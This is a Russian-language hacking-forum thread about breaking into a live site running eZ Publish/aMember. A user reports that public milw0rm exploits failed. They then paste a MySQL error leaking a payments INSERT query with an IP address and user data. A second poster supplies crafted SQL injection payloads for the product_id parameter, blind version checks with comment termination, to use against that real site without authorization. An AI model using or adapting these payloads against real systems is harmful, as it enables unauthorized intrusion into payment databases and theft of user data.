Форум АНТИЧАТ - eZ Publish CMS

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - eZ Publish CMS (https://forum.antichat.xyz/showthread.php?t=156423)

привет

На eZ Publish нету норм эксплойтов, нашел:

http://milw0rm.com/exploits/7406
пробовал но можеть спец изменили, не работает.
пишет HTTP Request not found

а http://milw0rm.com/exploits/7473
вообше вместо запуска блабла пишет на комм строке.

есть ресурс с 4 версии нашел скул в параметре product_id, но ответ вообше удивляет.

Цитата:

MYSQL ERROR:<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2009-11-13', '2009-12-13', 'free', '0', 0, '77.146.84.81', ' at line 6<br />in query:<br />INSERT INTO amember_payments (member_id, product_id, begin_date, expire_date, paysys_id, amount, completed, remote_addr, data, time, tm_added, tax_amount) VALUES ('2956', '1'', '2009-11-13', '2009-12-13', 'free', '0', 0, '77.146.84.81', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOU NT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"prod uct_id\";s:2:\"1\'\";s:22:\"paysys_id_not_required \";s:14:\"for javascript\";s:9:\"paysys_id\";s:4:\"free\";s:6:\" name_f\";s:7:\"maxoyyy\";s:6:\"name_l\";s:14:\"dot toyyyyyyyyy\";s:5:\"email\";s:26:\"rhghrefsssss@gr hrhmail.com\";s:5:\"login\";s:15:\"fgdgfdfvcccccc7 \";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6: \"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"pr ice_group\";s:0:\"\";s:6:\"aff_id\";N;s:14:\"email _verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:2:\"1\'\";}s :13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')

Нестандартный ошибка MySQL. Статьи elekt не помогли(хотя не очень разбирался).

Может кто проверит код эксплойта но ошибки или составит нормальный запрос на Mysql

Обычная ошибка, ничего нестандартного

Код:

product_id=1',(select if(substring(version(),1,1)=4,'2009-11-13',(select 1 union select 2))),'2009-12-13', 'free', '0', 0, '77.146.84.81', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOUNT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"product_id\";s:2:\"1\'\";s:22:\"paysys_id_not_required\";s:14:\"for javascript\";s:9:\"paysys_id\";s:4:\"free\";s:6:\"name_f\";s:7:\"maxoyyy\";s:6:\"name_l\";s:14:\"dottoyyyyyyyyy\";s:5:\"email\";s:26:\"rhghrefsssss@grhrhmail.com\";s:5:\"login\";s:15:\"fgdgfdfvcccccc7\";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_group\";s:0:\"\";s:6:\"aff_id\";N;s:14:\"email_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:2:\"1\'\";}s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')/*

спс но на твой запрос сервер даже не реагировал ((

а вот так?

Код:

product_id=1',(select if(substring(version(),1,1)=5,'2009-11-13',(select 1 union select 2))),'2009-12-13', 'free', '0', 0, '77.146.84.81', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOUNT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"product_id\";s:2:\"1\'\";s:22:\"paysys_id_not_required\";s:14:\"for javascript\";s:9:\"paysys_id\";s:4:\"free\";s:6:\"name_f\";s:7:\"maxoyyy\";s:6:\"name_l\";s:14:\"dottoyyyyyyyyy\";s:5:\"email\";s:26:\"rhghrefsssss@grhrhmail.com\";s:5:\"login\";s:15:\"fgdgfdfvcccccc7\";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_group\";s:0:\"\";s:6:\"aff_id\";N;s:14:\"email_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:2:\"1\'\";}s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')/*

нет никаких результатов((, можно считать скул просто ошибкой непробиваемым ((